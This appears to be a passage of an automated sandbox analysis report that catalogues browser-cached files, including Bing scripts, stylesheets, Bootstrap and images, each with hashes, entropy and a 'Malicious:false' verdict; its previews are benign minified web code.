                                                                            Preview:var BingAtWork;(function(n){var t;(function(n){n.fetchLowerHeader=function(n){sj_ajax("/business/lowerheader?q="+n,{callback:function(n,t){var u,r,i,f;n&&(u=_ge("b_content"),u&&(r=u.getElementsByTagName("main"),r&&r.length>0&&(i=r[0],i&&i.hasChildNodes()&&(f=sj_ce("div","b_lowerHeader"),t.appendTo(f),i.insertBefore(f,i.firstChild)))))}})};n.fetchScopeBar=function(n){sj_ajax("/header/scopebar?q="+n,{callback:function(n,t){var i,r,u,f;n&&(i=_ge("b_header"),i&&(r=i.getElementsByTagName("nav"),r&&r.length>0&&(u=r[0],u&&(f=sj_ce("div","b_nav"),t.appendTo(f),i.removeChild(u),i.appendChild(f)))))}})};n.fetchNotificationConditional=function(){sj_ajax("/business/notification/conditional",{callback:function(n,t){n&&t.appendTo(_d.body)}})};n.raiseAuthEventAndLog=function(n){var i=n.isAuthenticated,r=n.postUserNameInMessage,u=n.displayName,f=n.uniqueName,e=n.userObjectId,t;if(!i){sj_evt.fire("aad:signedout");return}t={displayName:u,uniqueName:f,userObjectId:e};r?sj_evt.fire("aad:signedin",t):sj_ev
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (488), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):488
                                                                            Entropy (8bit):5.157906423437102
                                                                            Encrypted:false
                                                                            SSDEEP:6:xFQxUmWpWEmWZg0Xm2Y3xAqTWtXWig5qgAvieJl11NGJT/GZ3C5C7mic+QY:f/phu0XmLxATbgIeeJlHUJK45h+QY
                                                                            MD5:E404FCCE98008500CF7FA93CB5E81B96
                                                                            SHA1:ADDED13AD14A4781A3D5C2324E41EFB8B4228D17
                                                                            SHA-256:8984ACE59AE13795FE201ABD98A1E7437373613153CA2DA224526E62F67F4168
                                                                            SHA-512:40F6C0106E17F17C872D413EF086A4EC795FBBE2B777B4D7A2B1FFD7054473D35FF06EBDA23BE99CF1C6A3AA64BF80FB25021AEB49D7332C6702258619A9DE73
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/rd7ROtFKR4Gj1cIyTkHvuLQijRc.css
                                                                            Preview:#sbiarea{display:inline-block}#sb_sbi{display:inline-block;cursor:pointer;vertical-align:middle;position:relative;width:18px;height:18px}:not(svg)#sbi_b{background-position:-682px 0;width:36px;height:36px;transform:scale(.5);position:absolute;top:2px;left:0}svg.sb_icon{fill:#00809d}#sb_sbip[shdlg]:hover::before,#sb_sbip[shdlg]:hover::after,#sb_sbip[shdlg].shtip::before,#sb_sbip[shdlg].shtip::after{display:none}:not(svg)#sbi_b{background-image:url(/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 200x200, components 3
                                                                            Category:dropped
                                                                            Size (bytes):9686
                                                                            Entropy (8bit):7.951518008359855
                                                                            Encrypted:false
                                                                            SSDEEP:192:WSRISe65dLuOsp3B8fbiBsSUavophQ/ZJN+RyovV5M20dK+Hpg4:9RISeW1k36zv9g7yyovV5zuFHpg4
                                                                            MD5:032DEBB13E75725E3A9449292C152432
                                                                            SHA1:6D011257AFBE5BB648F6E8D5A4F0419A63EBBE4D
                                                                            SHA-256:52B8C07A84D1F61D38497362A71130898FA80780BCAC879B052C5F29F0420688
                                                                            SHA-512:F0B18DC4E3F45E852BED8F90C91258454DC1AD86D6F162BF1D0CA2E231F79A72051EC7656CB72D55BBE057AA1CBC31115510229F48401055B5380E6087BF1AAF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(.f.....d.zP..3*)g`..I'.W..o..~..i."....../.._..^i...[.....]H..S.A...5.I..6z..7.: *n.........{..j{O..CJK.m....#...W...V...t.8....73M.q.L.....^)s...u^7....[O...%.D@g.&..O.M1....{.....ok........;./%}..=...[.<..)8....cI.q..........(K..3.w.....I..T.7...........ew.....I....%][D......(`..i....F...wS..F1.=GZ...2..N.....g..;[...N.........7._...3.5...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1083), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1083
                                                                            Entropy (8bit):5.254602394563815
                                                                            Encrypted:false
                                                                            SSDEEP:24:jsTbRWbhjMPGESPKfcPcfl7asTUm21GAUYaYjYxXW8:jMwdMeES0cSlmV1GARgxW8
                                                                            MD5:F4B86C563D82F98196D6EA70D9D6291D
                                                                            SHA1:5576F174D69DD24D653D009205396000F94DA7BF
                                                                            SHA-256:8BC8A47FB703D67068DA0AC857CF3DF47CBC6751424CD08D1AD3271362EEE03D
                                                                            SHA-512:CDECDA91834B97EBE5C67CA2C1D3AAE72B709A4AF002DBAB932ED03226CCF3ADEE21974E0893B4B989502D9673AFB9DBC226351B815E42083E0B53F2A645000B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/VXbxdNad0k1lPQCSBTlgAPlNp78.js
                                                                            Preview:var FocusScrollToBTop;(function(){function i(){var i=t()-n,u,f;i>AwayTimeThreshold&&r()&&((!AwayTimeThresholdCustomControl||AwayTimeThresholdCustomControl&&i>15)&&(AwayTimeScrollTopPoleRS&&(u=document.getElementsByClassName("b_adTop"),(!u||u.length<=0)&&(f=document.querySelector("#b_pole"),f&&(AwayTimeThresholdCustomControl||(f.style.display="block"),_w.sj_log&&sj_log("CI.ReturnTopPoleRS","ReturnTopPoleRS","Triggered")))),_w.scrollTo(0,0)),(i>AwayTimeThreshold&&i<=15||i<AwayTimeThreshold&&i>15)&&_w.sj_log&&sj_log("CI.ReturnTopLog","ReturnTop"+AwayTimeThreshold.toString(),"Triggered"),_w.sj_log&&sj_log("CI.ReturnTop","ReturnTop"+AwayTimeThreshold.toString(),"Triggered"),sj_evt.fire("focusTopScrollEnd"))}function r(){return _d.querySelector(".b_adTop")!=null}function u(){n=t()}function t(){return Math.round(Date.now()/1e3)}var n;sj_evt.bind("focusTopScrollStart",i);sj_evt.bind("focusTopBlur",u);sj_be(_w,"visibilitychange",function(){sj_evt.fire("focusTopScrollStart")});sj_be(_w,"blur",fu
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):294
                                                                            Entropy (8bit):4.858964667732823
                                                                            Encrypted:false
                                                                            SSDEEP:6:fxtrDxt74jfKO3NTfxtr25Pfxtr+cLnYxLSn:fzf4jVZG5PfOKnYpS
                                                                            MD5:C1570501FB16FE960538D1F90F0D1E87
                                                                            SHA1:A2970B6D6CF32835C0B7B38EB28E3F6AFEE70F55
                                                                            SHA-256:2CFEC125A3C1B5FFB74A84E5E58057EA602FBFCA3E6870E3C9822F5B6030D36E
                                                                            SHA-512:DA13C00CA652B332BA4954A45DD462C07AFFC4FCF88799974393E1F584961D6BE8D870E67143CDEBB75617DF227F74C75B337C793BF6EDD0E9C1C08D21A862B2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/opcLbWzzKDXAt7OOso4_av7nD1U.css
                                                                            Preview:#b_results .b_algo .b_vlist2col.b_deep,#b_results .b_algo .b_deep.b_moreLink{padding-left:16px}#b_results .b_algo .b_vlist2col.b_deep>ul:first-child{margin-right:0}#b_results .b_algo .b_vlist2col.b_deep>ul:nth-child(2){margin-left:44px}#b_results .b_algo form.b_externalSearch{margin-left:16px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (357), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):357
                                                                            Entropy (8bit):5.100320804030099
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8Ed7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mqJFO:2QVlY8EbgRUGhS+eTKb2PVESq8qrO
                                                                            MD5:2DF9793CF020A37C88178BE84311427A
                                                                            SHA1:29CFE86239722D4F4AF07C494D676092896A8600
                                                                            SHA-256:A69D257EEE41E843881D548D2E4EE5A0727B889AB22BFFDAA8ED1074E802BCC6
                                                                            SHA-512:E9A35EC1E466FEB3E273FB991A3282BA1C45FD0EACEA956E9821914CC4261377684B062BDE888EBF5767BBC055DB191DC14E00AF8037B5607449C06E5D2DD082
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Kc_oYjlyLU9K8HxJTWdgkolqhgA.js
                                                                            Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65294), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):83382
                                                                            Entropy (8bit):5.163838922143909
                                                                            Encrypted:false
                                                                            SSDEEP:768:59/iZDSuTVlHNvNu7MTMYnxKeNbtj+nUvAQ3+SQQnxyoM+Fos/aAMEolXlbBaCBH:5JiJS4KUwnUpkQYV+mB9mydftEyHdUPy
                                                                            MD5:0F346598A681BE469288C396E611C256
                                                                            SHA1:D76BA61BE7A0F383AC0327C94EAB357649544940
                                                                            SHA-256:154A4989329051467B3EFAF1090DEFD6724914255F6DE0A61FDAC6E34122B1B5
                                                                            SHA-512:21DD127D52CD438B81AA4CF3AC637FF4AFDD7806A4642868382641D004E21C75C6B68B39E06DD586EFF341AEF66A1D5F0FEBAAC13FB6C6F963DED7FF0FA64D72
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/js/lib/bootstrap/bootstrap.bundle.min.js
                                                                            Preview:/*!.. * Bootstrap v4.6.2 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery")):"function"==typeof define&&define.amd?define(["exports","jquery"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery)}(this,(function(t,e){"use strict";function n(t){return t&&"object"==typeof t&&"default"in t?t:{default:t}}var i=n(e);function o(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function r(t,e,n){return e&&o(t.prototype,e),n&&o(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t}function a(){return a=Object.assign?Object.assign.bind():function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):4.578223149067329
                                                                            Encrypted:false
                                                                            SSDEEP:3:2LGff6dCD1KOYKpmBhJeVlu:2LGX6dAAOYKmXJl
                                                                            MD5:A4514E4EDB31D874583B43D2E53E3620
                                                                            SHA1:55AC469678B62EB69C5E3F1C3D78A63D703CD70A
                                                                            SHA-256:A5A84A25FFDF1B34A268A98C8C8484BA773360CC4F9FADD526A4C7932677F088
                                                                            SHA-512:1890AD66EE5CC00D70445B13849F0C8E71FAAD5D3BEA610966617ED4C48B9418AC640C9EAD310853E30E6611E6FB7771B1DFB1E3BAD86010B5C34101A86D4D02
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){_w.sj_log&&sj_log("Info","ClientDimNotSent","1")})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1495), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1495
                                                                            Entropy (8bit):5.2715271964580745
                                                                            Encrypted:false
                                                                            SSDEEP:24:7JVCEan7NLRWm8tRWv6lOnRWtFjDPTDRRKXtwBUSbMh0ZkPBoGBYwIlRW3PwTeJF:ANLwHtwWOnwtNjTDGXt0UqMKZYoGBYfc
                                                                            MD5:45345F7E8380393CA0C539AE4CFE32BD
                                                                            SHA1:292D5F4B184B3FF7178489C01249F37F5CA395A7
                                                                            SHA-256:3A40A1FF034448D68D92A75ABABA09BA5F2B71D130F5F6BDF160DCF8851529A9
                                                                            SHA-512:2BFD00BF303AD5A1E8413B5EE6A162167605511FEFB8DF61A8F40F80382F5520DF690A53B1058365F1D81562B2668376886D0F829517A642FCD87412801FE987
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/KS1fSxhLP_cXhInAEknzf1yjlac.js
                                                                            Preview:function addRemoveListenersOnAll(){var t=_ge("b_content"),n,i,r;t&&(n=_d.createElement("STYLE"),n.id=styleIdString,n.innerText="#b_results h2>a {padding: 16px 40px 0 6px;margin: -16px -40px 0 -6px;}",_d.head&&_d.head.appendChild(n),i=t.getElementsByClassName("b_ad"),i&&AddRemoveListener(i),r=t.getElementsByClassName("b_algo"),r&&AddRemoveListener(r))}function AddRemoveListener(n){for(var t,i,u=n.length,r=0;r<u;r++)if(t=n[r].getElementsByTagName("CITE"),t&&t.length>0)for(i=0;i<t.length;i++)sj_be(t[i],"click",algo_c)}function mouseMoveAfterTouchHandler(){sj_ue(document,"mousemove",mouseMoveAfterTouchHandler);var n=_d.getElementById(styleIdString);n&&n.parentNode&&n.parentNode.removeChild(n);sj_log("CI.TTC","mouse","started");sj_ue(document,"mousemove",mouseMoveAfterTouchHandler)}function touchStartHandlerAll(n){n.pointerType==="touch"&&(addRemoveListenersOnAll(),sj_log("CI.TTC","touch","started"),sj_ue(document,"pointerdown",touchStartHandlerAll),document.addEventListener("mousemove",mou
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1293), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1293
                                                                            Entropy (8bit):5.1818500327560475
                                                                            Encrypted:false
                                                                            SSDEEP:24:2Q5xRWDVsFrvoUdVK8DncSxAqCVp2JP2Qm0UH0jziQJ4pOmb9+kxJ7rQiSDpEcM:/wDCLoUdV9nKqC7Gl3UWeQ+Rb9+kxsa
                                                                            MD5:1219DC0FC961884C63E3746A49D110D3
                                                                            SHA1:394C2FC179A2701BB15EFAB41A3FA052258603F9
                                                                            SHA-256:58AB30F993E014D3EE0E952C74811A8B34B13DB0AC41A97E94606C507BB0F798
                                                                            SHA-512:6403FF66B8A5FD0EA11D27EC5C379ECEEB9AD66762FFA773CEB0521EADB85828F99B8ED8223683E4E164180BD5E984F000335F3337D532CFE21E9AA5EED5C57E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/OUwvwXmicBuxXvq0Gj-gUiWGA_k.js
                                                                            Preview:(function(){for(var t=_d.getElementsByTagName("a"),i=!1,r,u=_G!==undefined&&_G.NTT!==undefined?_G.NTT:null,n=0;n<t.length;n++)typeof t[n]=="undefined"||!t[n].hasAttribute("target")||t[n].getAttribute("target")!="_blank"||!t[n].hasAttribute("href")||typeof t[n].getAttribute("href")=="undefined"||typeof t[n].getAttribute("href").startsWith=="undefined"||t[n].getAttribute("href").indexOf("javascript")>=0||t[n].getAttribute("href").indexOf("/rebates/welcome")>=0||t[n].hasAttribute("class")&&t[n].getAttribute("class").indexOf("b_ignbt")>=0||t[n].hasAttribute("onclick")&&t[n].getAttribute("onclick").indexOf("return false;")>=0||(sj_be(t[n],"click",function(n){for(var t=sj_et(n);t!=null;){if(t.tagName.toLowerCase()=="a"){u!=null&&(r=sb_st(function(){i=!0},u));break}t=t.parentNode}}),sj_evt.bind("uarequery",function(){sb_ct(r)}));u!=null&&(window.history.scrollRestoration="auto",_d.addEventListener("visibilitychange",function(){if(_d.visibilityState==="visible"&&!(_w&&_w._isConvAutoHide)&&(sj_
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2696), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2696
                                                                            Entropy (8bit):5.248435695658547
                                                                            Encrypted:false
                                                                            SSDEEP:48:hdorC4fo0TUE87aKOSfT1gt2lMJT1Ivrk8PUSFAa9D7R0QNy:MJo+UXF/fT1gt1xIHua9D7mQg
                                                                            MD5:6D59F14F93CD08A6714E2593C4E74189
                                                                            SHA1:2C528203BA2EBA96B9177AA65E51811B0800D56B
                                                                            SHA-256:3C3E3D23576C1480A0611019AB54070DD45FDEA74FAF172280DAC39B051B4359
                                                                            SHA-512:9FE3E120747E40503B6D6BA9C967E06D7413578F490CFCD453F4E7BD33C4674C7021189695AD67626A5C4A887EBDDC5DBE286C62531CD11B46921E742919ECA1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var sa_storage={},sa_eL=!1;(function(){function c(t){var i=decodeURIComponent(sa_config.u+encodeURIComponent(t));return n.ascsr&&(i=i+"&csr=1"),n.isPathSearch&&(i=i+"&pths=1"),n.enableRequeryParam&&(i=i+"&rqry=1"),n.ascssdis||n.ascsr||(i=i+"&css=1"),_G.IG!==null&&_G.IG!==""&&_G.IG!==undefined?i+"&zis=1&pf=1&cvid="+_G.IG:""}function v(n){Log&&Log.Log&&Log.Log("AS.Error",n,"AS",!0)}function l(){var f,u=t&&t.getAttribute("value")?t.getAttribute("value").toLocaleLowerCase():"",r,o,e;u.length<30&&(r=sj_gx(),o=c(u),o!==""&&(r.open("GET",c(u),!0),i!==null&&i.parentNode!==null&&(e=(f=i.parentNode.offsetWidth)===null||f===void 0?void 0:f.toString(),n.cors?r.setRequestHeader("contentWidth",e):r.setRequestHeader("X-Autosuggest-ContentWidth",e)),n.IsBingPrivate&&!n.cors&&r.setRequestHeader("preferAnonymous","1"),r.onload=function(){r.status===200&&(!n.ascsr||n.ascsr&&y(r.responseText))&&(sa_storage[u]=r)},r.send()))}function y(n){if(typeof n!="string"||n.length===0)return!1;try{return JSON.parse(n
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):9310
                                                                            Entropy (8bit):7.907965931624856
                                                                            Encrypted:false
                                                                            SSDEEP:192:qnmErbd5SU2ipCfR6VY9Fcygr2XecqN4zvEd4xSNzvkmglkz80bl7xcnobmP:S5bdAU3EJiHpSucq+z64xSlp40Bx8oKP
                                                                            MD5:1947B15739221EB0DB271C1DD8F95E46
                                                                            SHA1:900C22BFD81CE073DF1D2537C54429D97AA6E700
                                                                            SHA-256:FBF7FE8197902B32CE2C83F05DB73255553C716AC7B084FF1878E617963D0F51
                                                                            SHA-512:E73B17A0CCAEA85C539B5DA3BA978EBDA519D68F5686894EBEBBB529DCA54D07CA3508DBCED9D8F56D71D49469FA5916A7255B6CA455E00251D81B5E03410E5C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.PNG........IHDR.......\.......Gi...sPLTEGpL.e"..?..?..=........................uut.............O..K..J..J..K..K..J..J..M..O..S..O.uux.V..K.....ffffff.I.2..1..%q..>. Y.$d.BFBDDDDDDBGB.K...........K.$i.#a.DDDDDDDDDuww......!\.DDDDDDuwx.J.....\.$g. Z.CCCvvzvxywx{"^.CCCvwywx{vvwvvzwx{vwxxx|wx{wxzfff%.....$h.DDDCCC.h..[..x.._..S.vvx...9..._.%h.!`.DDD...AHAuwx.R..O.m.cK.}....U.g.c..N.Qs.X..]d..8..&.c...2.....$........#..e....'..h.vw.......XS..i........[..b.rC.H=www...zzz........T..................................J...................qqqqqqqqq.k..m.......413..................vvv....l.......uuu....m..................................................."........".."...\......tRNS..@..@.....` ...p.@.......p .``P.P_.........Z...0........p0_....P0....@@....... .p........"..R..@...0..0..... ...w...0..@.....X.......b.......... `......P@....p1`P.......=............p....D@..M.'.....0....Y.... .IDATx...Ub.@...S.ic.A.....E.....=%0s...^k"..S)..cff.U.en..".FS.Bm.j.m.....&.,.Y.0..........k.E.*U
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1937), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1937
                                                                            Entropy (8bit):5.461252594947073
                                                                            Encrypted:false
                                                                            SSDEEP:48:qYe3k+th+DNfxe2K9vdjmM0QVV9yTRKcDi4:hskXDuf9FmM0AP0LJ
                                                                            MD5:BA408C0E6B5F707319A057CF7CE3B4A7
                                                                            SHA1:BE42A50E853218E2F83DE38ACC3640C59225CFAF
                                                                            SHA-256:E64BDB46CBCAB956F480728DC1DC3AFB17C2C37F20886721246C101F24C3E03F
                                                                            SHA-512:6E64BD4A0F7E21C3551183960D88536D0613E617EE186AB52A2E679FA702B08230BBD2CB292A5602D13407DA7280A362FB46FCB15A40F3F77DE55BAE1C41754C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var WV=WV||{};(function(n){function u(){if("webVitals"in _w&&(!("isInit"in n)||!n.isInit)&&typeof sj_evt!="undefined"&&typeof sj_be!="undefined"){var t=_w.webVitals;n.onFCP=i(t.onFCP);n.onLCP=i(t.onLCP);n.onCLS=i(t.onCLS);n.onINP=i(t.onINP);n.metrics={};n.isMetricsFrozen=!1;n.isLogged=!1;sj_evt.bind("onP1",f,!0);sj_evt.bind("ajax.requestSent",h)}}function f(){if(!n.isInit){n.onFCP(e);n.onLCP(t);n.onCLS(t);n.onINP(t);n.isInit=!0}}function e(i){n.isFCPCalledOnce||(n.isFCPCalledOnce=!0,sb_st(function(){sj_be(_d,"visibilitychange",o);sj_be(_w,"pagehide",s)},0),t(i))}function o(){"visibilityState"in _d&&_d.visibilityState==="hidden"&&r()}function s(){r()}function h(){r();l()}function c(){n.isLogged=!1;n.metrics={}}function t(t){var i;switch(t.name){case"FCP":i=parseInt(t.value);break;case"LCP":i=parseInt(t.value);break;case"INP":i=parseInt(t.value);break;case"CLS":i=parseFloat(t.value).toFixed(4)}i&&n.metrics[t.name]!=i&&(n.metrics[t.name]=i,n.isLogged=!1)}function r(){!n.isLogged&&!n.isMet
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (388), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):388
                                                                            Entropy (8bit):4.845584148334156
                                                                            Encrypted:false
                                                                            SSDEEP:6:ynEaLsgYfE3eRWjTlE3eRACECdEozLKzECdE8Hk0eWGvnExVl3Ps:ynEaLtYfE1jTlESECxLKzECC0eWQnExo
                                                                            MD5:EA945CD5C3007EBD443981E18B0FF5A4
                                                                            SHA1:37C6F106D18E0FF458909C83A785FE4B65E4469D
                                                                            SHA-256:B4B7322FB90E7C372D6954B48C986847EE8B2627EBE1AD667E38612748029EAD
                                                                            SHA-512:8184AED66467CDE865B884EF1B40C1482D1A28EFDB28361D20489E6816412539CF4D53F1DCEFC6E5CA5ABADEEC3882F7C5F765F59B5E8CE7E8CE2B40F7341CD8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/N8bxBtGOD_RYkJyDp4X-S2XkRp0.css
                                                                            Preview:.b_scopebar li.tools_scope a{border-radius:20px;padding:0 12px}.tools_scope:not(.active):hover a{background-color:#ececec}.b_dark .tools_scope:not(.active):hover a{background-color:#323130}.tools_scope.active a{background:#e2e9ff;color:#174ae4;font-weight:700}.b_dark .tools_scope.active a{background:#a2b7f4;color:#1b1a19}.b_scopebar li.tools_scope:hover{border-bottom-color:transparent}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1083), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1083
                                                                            Entropy (8bit):5.254602394563815
                                                                            Encrypted:false
                                                                            SSDEEP:24:jsTbRWbhjMPGESPKfcPcfl7asTUm21GAUYaYjYxXW8:jMwdMeES0cSlmV1GARgxW8
                                                                            MD5:F4B86C563D82F98196D6EA70D9D6291D
                                                                            SHA1:5576F174D69DD24D653D009205396000F94DA7BF
                                                                            SHA-256:8BC8A47FB703D67068DA0AC857CF3DF47CBC6751424CD08D1AD3271362EEE03D
                                                                            SHA-512:CDECDA91834B97EBE5C67CA2C1D3AAE72B709A4AF002DBAB932ED03226CCF3ADEE21974E0893B4B989502D9673AFB9DBC226351B815E42083E0B53F2A645000B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var FocusScrollToBTop;(function(){function i(){var i=t()-n,u,f;i>AwayTimeThreshold&&r()&&((!AwayTimeThresholdCustomControl||AwayTimeThresholdCustomControl&&i>15)&&(AwayTimeScrollTopPoleRS&&(u=document.getElementsByClassName("b_adTop"),(!u||u.length<=0)&&(f=document.querySelector("#b_pole"),f&&(AwayTimeThresholdCustomControl||(f.style.display="block"),_w.sj_log&&sj_log("CI.ReturnTopPoleRS","ReturnTopPoleRS","Triggered")))),_w.scrollTo(0,0)),(i>AwayTimeThreshold&&i<=15||i<AwayTimeThreshold&&i>15)&&_w.sj_log&&sj_log("CI.ReturnTopLog","ReturnTop"+AwayTimeThreshold.toString(),"Triggered"),_w.sj_log&&sj_log("CI.ReturnTop","ReturnTop"+AwayTimeThreshold.toString(),"Triggered"),sj_evt.fire("focusTopScrollEnd"))}function r(){return _d.querySelector(".b_adTop")!=null}function u(){n=t()}function t(){return Math.round(Date.now()/1e3)}var n;sj_evt.bind("focusTopScrollStart",i);sj_evt.bind("focusTopBlur",u);sj_be(_w,"visibilitychange",function(){sj_evt.fire("focusTopScrollStart")});sj_be(_w,"blur",fu
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (889), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):889
                                                                            Entropy (8bit):5.3584953507061615
                                                                            Encrypted:false
                                                                            SSDEEP:24:dyOxb3thgU0Z7SWur4GkWe2MpuB5zQuCn0k+S:dvbd+UWWjk/5b+S
                                                                            MD5:285ED914665223C4517AF6DF060811D9
                                                                            SHA1:B2B69DD7EE59DB931F242E5E258492AE96A2F16D
                                                                            SHA-256:3FA599CC8AEEC7458CB69755C4C7EA9EF3615A624F9910BA527F6946C6A763F9
                                                                            SHA-512:35A561B971EE4E2122B6246800F897E103803ADEE8436373622748050FC846263C9D8089EE0E5F323A67F4130FAB36BCDFBB4C3F5721B13688FD67516BB4706B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var AccessibilityZoomDesktop;(function(){if(typeof sj_cook!="undefined"){var n="SRCHHPGUSR",t="PCMobUX",i="1";r();_w.addEventListener("resize",function(){return r()});function u(i){if(sj_cook.set(n,t,i,!0,"/"),sj_cook.get(n,t)!==i){typeof sj_log=="function"&&sj_log("CI.Info","cookie","read");return}sb_st(function(){_w.location.reload()},10)}function f(){var t=sj_cook.get(n,"WEBTHEME"),i=sj_cook.get(n,"THEME");t==="0"||t==="1"||t==="2"?sj_cook.set(n,"THEME",t,!0,"/"):i!=null&&sj_cook.set(n,"THEME","0",!0,"/")}function r(){var r=1;r=navigator&&navigator.userAgent.match(/Edge/)&&_w.screen?screen.deviceXDPI/screen.systemXDPI:navigator&&(navigator.userAgent.match(/Firefox/ig)||navigator.userAgent.match(/Trident/))?_w.devicePixelRatio:_w.outerWidth/_w.innerWidth;r>=4&&_w.devicePixelRatio>=4&&sj_cook.get(n,t)!=i&&(f(),u(i))}}})(AccessibilityZoomDesktop||(AccessibilityZoomDesktop={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                            Category:downloaded
                                                                            Size (bytes):4286
                                                                            Entropy (8bit):1.4428178104858655
                                                                            Encrypted:false
                                                                            SSDEEP:6:sfyl+rblmboWbol4bolnbsoItwqol0roooooosEol07ooooooooooolxo/lmyosh:suE9gwXZBQ4Nxbk7/GrQV/z1nfx
                                                                            MD5:30967B1B52CB6DF18A8AF8FCC04F83C9
                                                                            SHA1:AAF67CD84FCD64FB2D8974D7135D6F1E4FC03588
                                                                            SHA-256:439B6089E45EF1E0C37EF88764D5C99A3B2752609C4E2AF3376480D7FFCFAF2E
                                                                            SHA-512:7CB3C09A81FBD301741E7CF5296C406BAF1C76685D354C54457C87F6471867390A1AEED9F95701EB9361D7DFACCE31AFD1D240841037FC1DE4A120C66C1B088C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico
                                                                            Preview:...... .... .........(... ...@..... .........%...%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n...n...n....................................................................
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1700), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1700
